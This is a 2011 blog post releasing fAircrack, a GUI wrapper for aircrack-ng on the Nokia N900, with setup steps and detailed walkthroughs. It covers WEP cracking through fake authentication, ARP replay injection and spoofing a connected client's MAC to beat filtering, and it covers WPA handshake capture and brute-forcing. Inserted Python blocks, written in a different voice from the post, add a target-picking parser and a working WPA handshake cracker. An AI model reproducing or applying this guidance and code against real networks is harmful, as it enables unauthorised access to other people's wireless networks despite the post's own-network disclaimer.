Saturday, April 30, 2011

N900 FAircrack v0.3


12:34 AM

fAircrack v0.3 is ready! Here is what is different:

> The Decrypt tab is now split into sections for easier navigation.
> Fixed the bug where you had to press the enable/disable injection buttons twice for them to work.
> Introduced basic integration with John the Ripper!

I have posted some updated screen-shots so take a look.

Update instructions:
Make sure you install John from the extras-devel repository by running "apt-get install john" as root. You will also need to extract the new tar into your FAS directory, overwriting the old files.




John The Ripper:
At the moment I have only included basic support for John, and there are a few limitations. Firstly, it can only try passkeys that are exactly 8 characters long (8 characters is the minimum WPA allows, so it is a very common length). Secondly, you can only choose letters, numbers or both; special characters are not supported yet.

Please remember that it's about 3.30am here and I have JUST finished it. I don't see any problems but if something isn't working just post here and I will have a look in the morning.

Usage:
To use John, navigate to the Decrypt tab and click WPA. Select the cap file for which you have captured a handshake, choose your John settings (numbers/letters), then make sure the "John" button above the "Decrypt" button is highlighted before pressing Decrypt.

Please note that this is more proof of concept than anything else, and please read through the WPA section of the FAQs if you haven't already.

Have fun

---------------------------------------------------------------------------------

UPDATE: fAircrack v0.2 is out! Just a few minor changes. I'll make a bigger update over the weekend.

Changes:
> Added a button for a random mac address.
> Added a saved key browser.

Update instructions:
Just overwrite your FAS directory with the new tar. Simples

------------------------------------------------------------------------------------

Announcing fAircrack v0.1, The first Aircrack GUI for the N900 (as far as I know)

Disclaimer:

First things first, this script is only to be used to test your own network security. I am not responsible for:
> Damage to your phone
> Criminal convictions/fines
> Incidents in prison showers involving dropped soap and a tall stranger

In other words, use at your own risk and only for legitimate purposes. (And no, desperately needing to check your facebook while in a local internet café without paying is NOT a legitimate purpose)

------------------------ Features -------------------------------------------

This is the first release and as such is bound to have some bugs. It is the first ever project I have taken on of this nature so I welcome all constructive criticism.

At the moment it can:
> Enable/disable monitor mode
> Load/unload injection drivers
> Change your mac (requires macchanger)
> Scan for APs
> Capture ivs and WPA handshakes
> Authenticate
> Inject packets
> Crack WEP and bruteforce WPA
> Bruteforce WPA using John the Ripper
> All of the above without ONCE having to press a key

What it does not do but I am working on:
> Deauthentication for WPA (at the moment it can only capture the handshake when a client connects on its own; if you need to force one, you will have to deauthenticate a client manually)
> Chopchop wep attack
> Fragmentation wep attack

Also working on:
> Nicer GUI (obviously this is the first version so it will be far from flawless)
> More information
> More options

------------------------ Prerequisites ----------------------------------------

Mostly the same as for my FAS script. You will need:
> PyQt
> Sudser
> Aircrack-ng
> John the Ripper
> Bleeding-edge packet injection drivers by lxp
> Macchanger (optional)

Basically, if you have used my script then all you need is PyQt.

--------------------- Setup ---------------------------------------------------

Download faircrack.tar.gz and hildon.tar.gz to your MyDocs directory, then run the following command sequence as user:

Code:
cd /home/user/MyDocs/
mkdir FAS
cd FAS
tar -xzvf /home/user/MyDocs/faircrack.tar.gz
(The archive is extracted into the current directory, FAS; do not add a trailing "." to the tar command, as that tells tar to extract only a member named ".".) Make sure all the files have been extracted to the MyDocs/FAS/ directory and that the following folders exist:

MyDocs/FAS/keys/
MyDocs/FAS/diction/
MyDocs/FAS/cap/
MyDocs/FAS/cap/WEP/
MyDocs/FAS/cap/WPA/

Optional

If you would like to have a nice shortcut to fAircrack, use the next commands:
Code:
tar -xzvf /home/user/MyDocs/hildon.tar.gz
sudo gainroot
mv faircrack.desktop /usr/share/applications/hildon/
mv faircrack.png /usr/share/icons/hicolor/48x48/hildon/
(Run these from the same MyDocs/FAS directory; "sudo gainroot" keeps you in it.)
Thanks to tokag for his awesome icon.

---------------------- Usage ----------------------------------------

To run fAircrack, you can use the shortcut (recommended), or issue the following command:

sh /home/user/MyDocs/FAS/launch.sh

Bear in mind that if you run it from xterm you will probably see a few warning messages like "*.cap does not exist" and "basename usage". These come from my messy coding, cause no problems, and will be fixed in v0.2.

WEP

Firstly a little background information from the aircrack wiki

"A little theory first. WEP is a really crappy and old encryption technique to secure a wireless connection. A 3-byte vector, called an Initialization Vector or IV, is prepended onto packets and it's based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.

Well if it's on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition."


First things first, from the 'Monitor' tab enable the packet injection drivers and then monitor mode. At the moment there is no way to check if the drivers are enabled or not so if you aren't sure then just click the enable button anyway.

Next, click on the 'Access Point' tab. From here select how many seconds to run a scan for (the default is 5) and click the scan button. Make sure the WEP button is highlighted so that only WEP networks are shown. Select your target and click the "Start Packet Capture" button. This will load airodump in an xterm, locked to that network's channel; its "#Data" column is the number of IVs you have collected so far. Be sure to leave this window open until you are ready to crack.

Now click the "Authenticate" button to attempt a fake authentication with the access point (aireplay-ng's -1 attack). This is needed so that the AP accepts the packets you will inject. It launches a new xterm showing the progress of the authentication request. If you see a line similar to "Association successful :-) (AID: 1)" then all is good. If not, try changing your mac address to that of an already associated client (you can see them at the bottom of the airodump xterm). Bear in mind that changing your mac requires stopping and restarting your interface, and it WILL close your airodump window.

Once authenticated, click the "Injection" button. This launches a new xterm running the ARP request replay attack: it listens for ARP and ACK packets, and as soon as an ARP request is captured it SHOULD start re-injecting it at about 500 pps (packets per second). At this point the number of ARP requests, and the "#Data" count in airodump, should start to skyrocket. If injection starts but the ARP number remains static, the AP is dropping your frames and you need to authenticate with the router again. Leave the authentication and injection windows open.

To check how many IVs you have successfully captured, click on the "Decryption" tab and select your current CAP file from the list (its name is the network name followed by a number). Now click the "Decrypt" button. It will load aircrack in a new xterm; after reading the packets it displays how many IVs have been captured and attempts to crack the key. You will normally need at least 50,000 IVs for a successful crack (64-bit keys sometimes fall with fewer, 128-bit keys may need more), so if it is much less than this you may as well close this window and keep capturing.

Once you are ready to crack, press the decrypt button and if you have enough IVs, the password should be broken in seconds. At this point the aircrack xterm will close and you can view the key by selecting it from the list and clicking the "Show Key" button. If it doesn't show up, just press the "Refresh" button. (Keys are also stored in your MyDocs/FAS/keys/ directory).

If all went well then the whole process should take around 8-15 minutes.
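The scan, target selection and "clone an associated client's MAC" steps above all come down to reading the CSV file that airodump-ng writes next to the capture. The following is an added example, not part of fAircrack or aircrack-ng: it parses that CSV layout, lists the WEP networks with their IV counts and the stations already associated with each (the MAC you would hand to macchanger if fake authentication is refused), and flags which captures have reached the 50,000-IV rule of thumb. SAMPLE_CSV is constructed for the example, not a real capture.

```python
"""Pick a WEP target and a client MAC to clone from airodump-ng's CSV output.

Added example (not fAircrack or aircrack-ng code). Column layout follows the
<prefix>-01.csv file airodump-ng writes; SAMPLE_CSV below is constructed for
the example, not a real capture.
"""
import csv
import io

# Constructed sample: AP section, blank line, station section (airodump-ng layout).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-04-30 00:12:34, 2011-04-30 00:20:01,  6,  54, WEP , WEP, OPN, -45,  120, 61204,   0.  0.  0.  0,   7, homenet,
66:77:88:99:AA:BB, 2011-04-30 00:12:35, 2011-04-30 00:20:01, 11,  54, WPA2, CCMP, PSK, -70,   98,     0,   0.  0.  0.  0,   5, cafe5,
CC:DD:EE:FF:00:11, 2011-04-30 00:12:36, 2011-04-30 00:20:00,  1,  54, WEP , WEP, OPN, -80,   40,   812,   0.  0.  0.  0,   6, oldnet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2011-04-30 00:12:40, 2011-04-30 00:19:58, -60,  2400, 00:11:22:33:44:55, homenet
AA:BB:CC:DD:EE:02, 2011-04-30 00:13:02, 2011-04-30 00:19:30, -75,   310, 66:77:88:99:AA:BB, cafe5
AA:BB:CC:DD:EE:03, 2011-04-30 00:13:10, 2011-04-30 00:14:00, -88,     5, (not associated), homenet,oldnet
"""

# The post's rule of thumb for when aircrack-ng's PTW attack usually succeeds;
# 128-bit WEP keys often need more than this.
MIN_IVS = 50000


def parse_airodump_csv(text):
    """Return (aps, stations) from airodump-ng CSV text.

    aps: dict bssid -> {essid, channel, privacy, ivs}
    stations: list of (station_mac, bssid) for associated stations only
    Note: an ESSID containing a comma breaks this file format itself; use
    airodump-ng's kismet/netxml output for those.
    """
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                      # blank separator line
        first = row[0].strip()
        if first == "BSSID":
            section = "ap"                # header of the access point table
            continue
        if first == "Station MAC":
            section = "sta"               # header of the station table
            continue
        if section == "ap" and len(row) >= 14:
            aps[first] = {
                "essid": row[13].strip(),
                "channel": int(row[3]),
                "privacy": row[5].strip(),    # "WEP", "WPA", "WPA2", "OPN", ...
                "ivs": int(row[10]),          # the "# IV" column (airodump's #Data)
            }
        elif section == "sta" and len(row) >= 6:
            bssid = row[5].strip()
            if bssid != "(not associated)":
                stations.append((first, bssid))
    return aps, stations


def wep_targets(aps, stations):
    """WEP networks, most IVs first, each with the client MACs seen on it.

    A listed client MAC is what you would give macchanger when fake
    authentication is rejected: the AP is already accepting that address.
    """
    clients = {}
    for mac, bssid in stations:
        clients.setdefault(bssid, []).append(mac)
    targets = []
    for bssid, ap in aps.items():
        if ap["privacy"].startswith("WEP"):
            targets.append({
                "essid": ap["essid"],
                "bssid": bssid,
                "channel": ap["channel"],
                "ivs": ap["ivs"],
                "clients": clients.get(bssid, []),
                "crack_ready": ap["ivs"] >= MIN_IVS,
            })
    return sorted(targets, key=lambda t: t["ivs"], reverse=True)


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for target in wep_targets(aps, stations):
        print(target)
```

For reference, the buttons in the walkthrough map onto the standard aircrack-ng invocations: "Start Packet Capture" is airodump-ng -c <channel> --bssid <bssid> -w <prefix> <iface>, "Authenticate" is aireplay-ng -1 0 -a <bssid> -h <your mac> <iface>, "Injection" is aireplay-ng -3 -b <bssid> -h <your mac> <iface>, and "Decrypt" is aircrack-ng -b <bssid> <prefix>-01.cap. The exact options fAircrack passes are not shown on this page, so treat that mapping as the usual command lines rather than the script's own.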


WPA

WPA is different. Read the FAQs for more information.

First scan for networks as before and select WPA to display the WPA access points. Now click on which one you want to crack and press the "Start Packet Capture" button.

Now you will have to wait for a client to connect to the access point, at which point you will see a message in the top right of your airodump window saying "WPA handshake:" followed by the mac address of the router. Only a client that actually joins (or rejoins) produces a handshake; an AP beaconing on its own never sends one.

Now click on the "Decryption" tab. From here select the current cap from the list (being sure to select WPA and not WEP), then either select a dictionary or specify an attack method for John. When you are ready, highlight either "wordlist" or "john" and press Decrypt.

------------------------------ FAQs -----------------------------------

Q. It keeps asking me for a password. Wtf?
A. Install Sudser

Q. What's an access point?
A. Wireless router.

Q. What will I use this for?
A. If you don't know the answer to that then you don't need it.

Q. Why do I keep receiving deauth packets when authenticating?
A. Most likely the access point is filtering MAC addresses. Try changing your mac (from the main menu) to match a client that is already connected; you can find one in the already opened airodump window.

Q. Why am I not receiving any ARP packets when trying to perform injection?
A. Depending on the access point, it may be very difficult to capture/relay ARP requests, particularly if:
> You are not close enough to the access point.
> There is no traffic on the access point.
I find the number starts rising rapidly as soon as a client connects.

Q. I have tried everything, but just cannot inject/authenticate/anything. What gives?
A. Unfortunately, each make/model of router is different and no matter how hard you try you may not be able to get into it. fAircrack uses the settings that in my experience have been the most successful, but you may have better luck running aircrack-ng directly and experimenting. (Future releases will have far more options.)

Q. Why is WPA so much harder to crack?
A. WEP's weakness is in how it uses RC4: every packet carries its 24-bit IV in the clear, and for many IVs the first bytes of the RC4 keystream leak information about the secret key. Collect enough IVs and aircrack can recover the key statistically, without guessing it. WPA has no such flaw and cannot be "cracked" in that sense. What can be attacked is the pre-shared key: when a client joins a WPA access point, a four-way handshake is exchanged in which both sides prove knowledge of the key through a MIC. airodump can capture this handshake, and aircrack can then run a dictionary attack against it offline, deriving a candidate key from each word and checking it against the MIC (so if the exact key is not in the dictionary, it will obviously not be found). To capture the handshake you can either wait for a client to connect, or launch a deauthentication attack (using my script) to force a client to disconnect and reconnect to the AP, at which point the handshake is sent again.

However, a word list big enough to 100% GUARANTEE cracking an 8-character alphanumeric, case-sensitive WPA key would have to hold 62^8 = 218,340,105,584,896 (about 2.2 × 10^14) candidates. And this is WITHOUT symbols.

On the same basis, a 64-character alphanumeric key has 62^64, roughly 5 × 10^114, possible values.

The 8-character list alone would take about 2 petabytes on disk (thousands of terabytes); the 64-character one could not be stored at all.

In short, it's possible but not feasible. Bear in mind that a device like the N900 could probably only check around 20-30 keys per second, which would take hundreds of thousands of years for the 8-character space alone. The best you can do is capture the handshake with the N900 and then use a desktop to attempt to crack the password.

Realistically, the only way you are going to bruteforce a WPA key is if the person who owns the network (obviously you) has set something really mundane or stupid as their key. Any default key containing letters and numbers would be near enough impossible and could take years to break.
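The "dictionary attack against the handshake" described above, and the letters/numbers mode the John integration asks for, both reduce to one per-candidate check. The block below is an added example for both passages; it is not fAircrack's or aircrack-ng's code. It implements the check aircrack-ng performs for each candidate (PBKDF2-HMAC-SHA1 of passphrase and ESSID to get the PMK, the 802.11i PRF to derive the PTK, and an HMAC over EAPOL message 2 compared with the captured MIC), enumerates an 8-character keyspace the way the John mode does, and carries the FAQ's keyspace arithmetic through with correct numbers. The handshake it attacks is constructed for the example (made-up MACs, nonces and a condensed EAPOL frame), not a real capture.

```python
"""WPA-PSK dictionary attack against a 4-way handshake, plus keyspace arithmetic.

Added example for the John the Ripper section and the WPA FAQ; not fAircrack's
or aircrack-ng's code. The handshake built by make_handshake() is constructed
for the example, not taken from a real capture.
"""
import hashlib
import hmac
import itertools
import time


def pmk_from_passphrase(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: PTK from PMK, both MACs and both nonces; the KCK is PTK[0:16]."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck, eapol_frame, wpa2=True):
    """Key MIC over the EAPOL frame with its MIC field zeroed, truncated to 16 bytes:
    HMAC-SHA1 for WPA2/CCMP, HMAC-MD5 for WPA/TKIP."""
    return hmac.new(kck, eapol_frame, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def crack_handshake(hs, candidates):
    """Return the first candidate whose derived MIC matches the captured one, else None."""
    for pw in candidates:
        pw = pw.rstrip("\r\n")
        if not 8 <= len(pw) <= 63:      # outside WPA-PSK's length range: cannot be the key
            continue
        kck = prf512(pmk_from_passphrase(pw, hs["essid"]), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol2"], hs["wpa2"]), hs["mic"]):
            return pw
    return None


def make_handshake(passphrase, essid="homenet"):
    """Constructed stand-in for what airodump-ng stores when a client joins (assumed values)."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddee01")
    anonce = hashlib.sha256(b"example-anonce").digest()
    snonce = hashlib.sha256(b"example-snonce").digest()
    # condensed EAPOL-Key message 2: header, key info, replay counter, SNonce, zeroed MIC
    eapol2 = b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x00" + b"\x00" * 8 + snonce + b"\x00" * 16
    kck = prf512(pmk_from_passphrase(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"essid": essid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol2": eapol2, "wpa2": True, "mic": eapol_mic(kck, eapol2)}


def mask_candidates(alphabet, length):
    """Every string of `length` symbols over `alphabet`: the exhaustive mode the
    John integration requests (letters, digits or both, length 8)."""
    for tup in itertools.product(alphabet, repeat=length):
        yield "".join(tup)


def keyspace(alphabet_size, length):
    return alphabet_size ** length


def wordlist_bytes(alphabet_size, length):
    """On-disk size of the complete list: each candidate plus a newline."""
    return keyspace(alphabet_size, length) * (length + 1)


def years_to_exhaust(alphabet_size, length, keys_per_second):
    return keyspace(alphabet_size, length) / keys_per_second / (365 * 24 * 3600)


def measure_rate(hs, n=20):
    """Candidates checked per second on this machine (PBKDF2 dominates, as in aircrack-ng)."""
    start = time.perf_counter()
    crack_handshake(hs, ("benchmark%02d" % i for i in range(n)))
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    hs = make_handshake("letmein1")
    print("recovered:", crack_handshake(hs, ["password", "12345678", "letmein1"]))
    print("%.0f keys/s here" % measure_rate(hs))
    print("62^8 = %d candidates, %.1f PB as a wordlist, %.0f years at 30 keys/s"
          % (keyspace(62, 8), wordlist_bytes(62, 8) / 1e15, years_to_exhaust(62, 8, 30)))
```

Feeding mask_candidates(string.ascii_letters + string.digits, 8) into crack_handshake is exactly the exhaustive letters-and-numbers attack the John mode runs, and measure_rate shows why the FAQ says to do it on a desktop: the 4096-iteration PBKDF2 per candidate is the whole cost, and nothing about the handshake lets you skip it.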

----------------------------------------------------------------------

Please post any comments/problems and I will be happy to address them.

Happy point-and-click pwnage everybody
Original post Link

